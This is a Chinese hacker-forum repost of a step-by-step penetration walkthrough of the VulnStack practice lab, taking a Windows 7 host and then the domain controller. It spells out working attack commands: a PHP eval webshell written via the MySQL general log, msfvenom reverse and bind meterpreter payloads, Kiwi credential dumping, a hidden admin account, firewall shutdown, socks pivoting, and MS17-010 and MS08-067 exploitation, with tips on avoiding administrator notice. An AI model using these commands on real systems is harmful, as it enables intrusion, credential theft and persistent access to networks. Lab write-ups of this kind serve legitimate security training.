跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

VulnStack超全面详细的渗透测试笔记

HACK1949
HACK1949
WEB和服务器安全漏洞

精选回复

发布于


1. 根据网卡获取的网段信息,对win7所在网段来一波存活主机检测,排除其他的之后目标锁定在主机号为128的主机上
1049983-20220124163656561-1125058078.jpg
2. 对发现的存活主机来一波整体信息收集发现开了以下的端口,并且是一个域用户
┌──(root?kali)-[/]
└─# nmap -A 192.168.164.128         
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-26 09:53 CST
Nmap scan report for 192.168.164.128
Host is up (0.00052s latency).
Not shown: 989 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.23 ((Win32) OpenSSL/1.0.2j PHP/5.4.45)
|_http-server-header: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: GOD)
1025/tcp open  msrpc        Microsoft Windows RPC
1026/tcp open  msrpc        Microsoft Windows RPC
1027/tcp open  msrpc        Microsoft Windows RPC
1028/tcp open  msrpc        Microsoft Windows RPC
1029/tcp open  msrpc        Microsoft Windows RPC
1030/tcp open  msrpc        Microsoft Windows RPC
3306/tcp open  mysql        MySQL (unauthorized)
MAC Address: 00:0C:29:A7:C1:B2 (VMware)
Device type: general purpose|media device
Running: Microsoft Windows 2008|10|7|8.1, Microsoft embedded
OS CPE: cpe:/o:microsoft:windows_server_2008::sp2 cpe:/o:microsoft:windows_10 cpe:/h:microsoft:xbox_one cpe:/o:microsoft:windows_7::- cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_8.1
OS details: Microsoft Windows Server 2008 SP2, Microsoft Windows Server 2008 SP2 or Windows 10 or Xbox One, Microsoft Windows 7 SP0 - SP1, Windows Server 2008 SP1, Windows Server 2008 R2, Windows 8, or Windows 8.1 Update 1
Network Distance: 1 hop
Service Info: Host: STU1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -2h40m00s, deviation: 4h37m07s, median: 0s
|_nbstat: NetBIOS name: STU1, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:a7:c1:b2 (VMware)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: stu1
|   NetBIOS computer name: STU1\x00
|   Domain name: god.org
|   Forest name: god.org
|   FQDN: stu1.god.org
|_  System time: 2021-07-26T09:55:13+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-26T01:55:13
|_  start_date: 2021-07-26T01:43:45

TRACEROUTE
HOP RTT     ADDRESS
1   0.51 ms 192.168.164.128

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.47 seconds


3. 访问改web服务器的地址获取页面内容,发现并没有什么可以利用的东西,只能先目录扫描获取一些有用有用信息
Image

4. 用dirsearch工具来扫描,kali默认没有安装,自己装一下就好了,发现有phpmyadmin的目录,说明安装了phpmyadmin,正好和端口扫描的3306 mysql服务相对应,然后在把目录都访问一遍之后发现了phpstudy探针
└─dirsearch -u http://192.168.164.128
1049983-20220124163657643-947942079.jpg
1049983-20220124163658075-1726175893.jpg
1049983-20220124163658612-465160310.jpg


5. 本来想着找个python脚本爆破一下,可惜网上的大多用不了,手动猜出来了root:root,登陆进去之后就是通过phpmyadmin写入webshell了

我们这里用日志写入一句话的方式,首先进入phpmyadmin后台,查看genelog变量,更改general log和general log file参数,初始设置general log是OFF,我们将其改成ON;general log file改成网站的根目录,通过phpstudy指针已经知道了网站根目录

show global variables like '%general%';
1049983-20220124163658979-1304601894.jpg
set global general_log='on';
1049983-20220124163659359-1494375577.jpg
set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';
1049983-20220124163659753-785844255.jpg
1049983-20220124163700112-1488155052.jpg
这边写入大马意识可以的:
select '<?php eval($_POST["shell"]);?>';
1049983-20220124163700460-1385858156.jpg

6. 蚁剑连接不用多说了,这边有个坑,蚁剑下载插件的时候用了代理,本地环境连接一直连不上,人麻了,测试了一下权限administrator真的高
1049983-20220124163700864-97590115.jpg
1049983-20220124163701281-1063953075.jpg

7. 查看根目录之后发现了一个cms,我们在浏览器访问,自己安装的phpstudy打不开这个管理系统,把原来的phpstudy重启一下完美解决

不用扫目录之类的了,主页面已经给了出来信息直接用,进入后台并登录

1049983-20220124163701789-1040937776.jpg
8. 在前台模板哪里发现了上传点,我们可以上传一个大马,奥里给!创建了一个名为shell_1.php的文件,然后就是查找创建的目录
1049983-20220124163702107-1351853537.jpg

9. 找了半天,在robots.txt里面找到了目录一个一个找出来了,不过好像可以目录穿越出来,我试了几下没粗来,不过这个大马子挺好用
1049983-20220124163702542-1674450715.jpg
1049983-20220124163703171-1694785742.jpg


10. 看了一下教程,说是留言板有个xss的,我们也来试试

<script>alert('xss')</script>
成功弹窗
1049983-20220124163703585-390539443.jpg


1049983-20220124163703949-1176429500.jpg



11. 不整那么多了,现在就是经典内网环节,先用msf生成马子用蚁剑上传,反弹shell用msf监听
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.164.129 LPORT=1222 -f exe -o asd.exe
把生成的马子传上去之后执行,msf监听拿到会话
use exploit/mutli/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.164.129
set lport 1222
1049983-20220124163704487-47259947.jpg

12. 本来获得会话之后就要是要提权,这个进来之后就是admin,所以省略这一步,我们直接抓取域用户的密码信息
1049983-20220124163704953-312057181.jpg

13. 加载Kiwl插件获取hash并解密

ps:
migrate PID(进程迁移)这边meterpreter是32位的,系统是64位的,所以得迁移进程
meterpreter > load Kiwi
meterpreter > creds_all
1049983-20220124163705350-2035690409.jpg
1049983-20220124163705785-634197299.jpg


14. 开启3389端口,进入远程桌面,用nmap看看开了没,这边还需要自己添加用户
net user test Admin123 /add # 添加账户密码
net localgroup administrators test /add # 给test账户添加为管理员权限
net user test # 查询是否成功添加test用户
1049983-20220124163706197-1407371529.jpg
run post/windows/manage/enable_rdp
1049983-20220124163706612-1070207583.jpg
rdesktop 192.168.164.128:3389  kali的一个远程工具

1049983-20220124163707041-1662674497.jpg

1049983-20220124163707457-1926033716.jpg

15. 开始横向移动,先自动创建路由 

run post/multi/manage/autoroute
1049983-20220124163707791-1415437196.jpg


16. 挂起会话,通过post/multi/manage/autoroute 这个模块查看路由表
1049983-20220124163708156-663702438.jpg
17. 使用auxiliary/server/socks_proxy这个模块开进行socks代理,设置好服务器ip和端口,运行后自动挂入后台
1049983-20220124163708496-1356485243.jpg

1049983-20220124163708840-847496576.jpg


18. 修改/etc/proxychains.conf文件
1049983-20220124163709234-2031316841.jpg
19. 查看socks5的端口开启了没
1049983-20220124163709577-617345335.jpg
20. 起来了之后就可以使用nmap扫描到内网的存活主机,这样扫描起来有点慢
proxychains nmap -sT -Pn 192.168.52.143
1049983-20220124163709895-1626846477.jpg

1049983-20220124163710325-549330618.jpg

21. 我们这里使用msf自带的模块来扫描,发现了两台存活的主机
use auxiliary/scanner/netbios/nbname
1049983-20220124163710691-459367703.jpg

22. 再用msf的端口扫描模块对发现的主机扫描,查看开放的端口,这边双管齐下,扫描的太慢了

use auxiliary/scanner/portscan/tcp

1049983-20220124163711074-92017917.jpg

23. 都开了445端口经典ms17_010利用起来,先扫描发现有ms17_010的洞
use auxiliary/scanner/smb/smb_ms17_010

1049983-20220124163711501-1469255573.jpg

1049983-20220124163711816-2123469220.jpg
24. 既然都有洞了,我门直接丝滑小连招,使用ms17_010的command模块可以执行指令
use auxiliary/admin/smb/ms17_010_command

1049983-20220124163712230-154499124.jpg

25. 这个上车补票卫视不晚,我们搜集一波域信息
net config workstation  查看是否有域,以及当前登录域
1049983-20220124163712659-1957854137.jpg
这边有一个乱码问题,我们在shell视图输入,完美解决
C:\Windows\system32>chcp 65001
net view 查看域内主机列表
1049983-20220124163713025-1887459423.jpg
net group "domain controllers" /domain 查看域控制器(如果有多台)
1049983-20220124163713448-72691699.jpg
然后通过 ping 命令查看域中主机的ip
1049983-20220124163713880-134694688.jpg
net user /domain 查看域内所有域用户
1049983-20220124163714239-112137281.jpg
net group "domain admins" /domain 查看域管理员列表

1049983-20220124163714562-1206214181.jpg

26. 完全可以用ms17_010command模块来执行命令,打开3389添加用户,登陆进去,其实在win7上就拿到了管理员用户名和密码,不过这是练习,我们就在继续骚操作

我们通过弹一个正向shell (因为msf 开了代理,所以不能弹反向shell),我们可以win7远程桌面,所给把马子传给win7然后开共享目录,下载到域控上面,然后执行

msfvenom -p windows/meterpreter/bind_tcp -f exe -o /home/dzj/s.exe
1049983-20220124163714992-2028160141.jpg
msfconsole开启监听
use exploit/multi/handler
1049983-20220124163715393-2137202670.jpg

win7开启共享
1049983-20220124163715778-679004397.jpg
1049983-20220124163716113-2145343088.jpg

然后用域控的ms17_010command执行复制指令
copy \\192.168.52.143\WWW\s.exe C:\s.exe
这里又有一个坑,win7防火墙开了,导致域控一直下载不了文件,麻了
查看放防火墙状态:
netsh advfirewall show allprofile state
1049983-20220124163716466-201506023.png
关闭所有防火墙:
netsh advfirewall set allprofiles state off
1049983-20220124163716827-1775957244.jpg
再试试下载文件,不能下载,我们用其他方法
set command copy \\\\STU1\\WWW\\s2.exe C:\\s2.exe
1049983-20220124163717282-1244530158.jpg

这里我是下完之后试的,重启机子就好了,我tm
Image

然后就是msf监听了
set payload windows/x64/meterpreter/bind_tcp
一直连不上shell应该是防火墙的原因,不过我在用win7的nmap扫描之后发现了ms08_067
Image

27. 利用exploit/windows/smb/ms08_067_netapi这个模块直接拿shell
set payload windows/meterpreter/bind_tcp
Image

28. 利用一下win7上的nmap了扫描一下另外两个主机,两个主机都有ms17_010的洞,不过有一台是32位的系统利用不了,只能从另一台下手了
exploit/windows/smb/ms17_010_eternalblue
这还有坑这个主机开了防火墙,我之前试了几次一直拿不到shell,用ms17_010command执行指令关闭之后就返回了shell,这个因为开了代理所以得用set payload windows/x64/meterpreter/bind_tcp正向连接
Image
Image

29. 现在就是抓取hash密码,开启远程桌面,作为桌面党开了远程桌面才算舒服了~~~
Image
Image

套娃ing,这里可以用端口转发,我直接在win7的远程再开一个远程
Image

30. 最后一个其实已经拿到域管理员的密码了可以直接用ms17_010commad关闭防火墙打开3389了

这里还有一点对于非服务器版本的windows 远程登录的话,会断开该主机当前的连接,有可能会惊动管理员。这个时候不慌,可以使用rdpwrap。

rdpwrap是一款可以允许非服务器版本进行多个用户登录的patcher,从github上面下载下来,用蚁剑把 RDPWInst.exe 传上去,然后执行:

RDPWInst.exe -i -s

总结:

1.通过NMAP对目标网络段进行存活主机探测,通过排查发现目标主机128有可利用点
nmap  -sp  192.168.164.0/24
2.对128主机进行端口探测,发现是该主机是域成员主机以及开放了80,445,3306端口
nmap  -A  192.168.164.128
3.通过dirsearch对192.168.164.128的web应用进行URL目录扫描,发现存在phpmyadmin目录和l.php
4.访问1.php,发现网站的根目录为:C:/phpStudy/PHPTutorial/WWW/
5.访问phpmyadmin目录,是网站的数据库管理系统,这里通过尝试输入弱口令root/root即可登录系统
6.在sql语句中执行命令查看general变量,发现general log是OFF,并且发现general log file的根目录是C:/phpStudy/PHPTutorial/MYsql/
show global variables like '%general%';
7.将general log设置为on
set global general_log='on';
8.将 general log file设置为网站根目录
set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';
9.通过log日志写入一句话
select '<?php eval($_POST["shell"]);?>';
10.通过蚁剑成功连接一句,并通过自带的命令功能查看下当前目标权限为admin权限
whomai
12.发现目标系统中的根目录下还有一个CMS目录,访问CMS目录,公告直接泄露了网站后台的用户名和密码,可成功登陆到系统后台
13.在后台模板处可直接上传php大马,大马名称为shell_1.php
14.通过robots.txt查看到泄露的目录,访问目录,可目录遍历到上传到大马的目录保存路径
http://192.168.164.128/yycms/protected/apps/default/view/default
15.可成功访问php大马
http://192.168.164.128/yycms/protected/apps/default/view/default/shell_1.php
16.在攻击机上执行MSF生成的后门
msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.164.129 LPORT=1222 -f exe -o asd.exe
17.通过蚁剑将asd.exe上传到目标系统中,并通过其命令功能执行
c:/>acd.exe
18.MSF进行监听,成功上线
use exploit/mutli/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost 192.168.164.129
set lport 1222
19.通过smart_hasdump模块获取目标的hash值,可成功获取到管理员的hash
meterpreter>run  post   /windows/gather/smart_hashdump
20.加载kiwi插件获取hash并解密
meterpreter > load Kiwi
meterpreter > creds_all
21.通过注册表开启3389端口,添加远程桌面用户,进入远程桌面
meterprter>shell
c:/>ipconfig   //查看到目标系统存在两个网卡,一个网卡IP地址为192.168.164.128,另外一个网卡IP地址为192.168.52.143
c:/>net user test Admin123 /add # 添加账户密码
c:/>net localgroup administrators test /add # 给test账户添加为管理员权限
c:/>net user test # 查询是否成功添加test用户
rdesktop 192.168.164.128:3389  //kali下进行远程桌面
22.开始横向移动,先自动创建路由 
meterprter>run post/multi/manage/autoroute
23.挂起会话,通过post/multi/manage/autoroute查看路由表
meterprter>background
msf>use   post/multi/manage/autoroute
msf>set  session 1
msf>route print
msf>run
24.使用auxiliary/server/socks_proxy这个模块开进行socks代理,设置好服务器ip和端口,运行后自动挂入后台
msf>use   auxiliary/server/socks_proxy
msf>set srvhost  127.0.0.1
msf>run
25.修改/etc/proxychains.conf文件
sokcs5  127.0.0.1  1080
26.查看socks5端口
netstat  -an |grep 1080
27. 这里使用msf自带的模块来扫描,发现了两台存活的主机(192.168.52.138与192.168.52.141)
use auxiliary/scanner/netbios/nbname
28.通过proxychains加载nmap进行扫描另一个网卡IP 192.168.52.141端口,发现也开放了80,335,3306,445端口
proxychains nmap -sT -Pn 192.168.52.141
29.再用msf的端口扫描模块对发现的主机扫描,查看开放的端口,发现192.168.52.138端口开放了21,445等端口
use auxiliary/scanner/portscan/tcp
30.都开了445端口经典ms17_010利用起来,先扫描发现有ms17_010的漏洞
use auxiliary/scanner/smb/smb_ms17_010
31. 使用ms17_010的command模块可以执行指令
use auxiliary/admin/smb/ms17_010_command
32.查看目标系统信息
msf>sessions  -i  2
meterprter>shell
c:/>net  config  workstation  //查看是否有域,查看当前域情况
c:>chcp  65001  //解决中文乱码
c:/>net view  //查看当前域主机列表
c:/>net group  "domain  controllers" /domain  //查看域控制器
c:/>ping  owa   查看计算机名对应的IP地址
c:/>net user  /domain 查看域内用户
c:/>net group "domain admins" /domain 查看域管理员列表
33.通过弹一个正向shell (因为msf 开了代理,所以不能弹反向shell),我们可以win7(192.168.52.143)远程桌面,所给把马子传给win7然后开共享目录,下载到域控上面,然后执行
msfvenom -p windows/meterpreter/bind_tcp -f exe -o /home/dzj/s.exe
34.MSF进行监听
use exploit/multi/handler
set payload   windows/meterprter/bind_tcp
set lhost 192.168.164.129
set lport 3333
run
35.远程桌面上win7(192.168.52.143)开启共享
36.在域控主机上下载s.exe
copy \\192.168.52.143\WWW\s.exe C:\s.exe  //发现下载不了,估计是win7防火墙开了
37.查看放防火墙状态:
netsh advfirewall show allprofile state
38.关闭所有防火墙:
netsh advfirewall set allprofiles state off
39.再试试下载文件,不能下载,我们用其他方法
set command copy \\\\STU1\\WWW\\s2.exe C:\\s2.exe
下载地址:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/


原文连接: https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==&mid=2247490306&idx=1&sn=1de54ed0a21ae330bf0370969c9d77ae&chksm=cfa6bf11f8d136070e1e4d5fe4bade74b82683e844cb9c3013fcdb4aaba546a70cc019ba1209&scene=178&cur_album_id=1553386251775492098#rd



创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。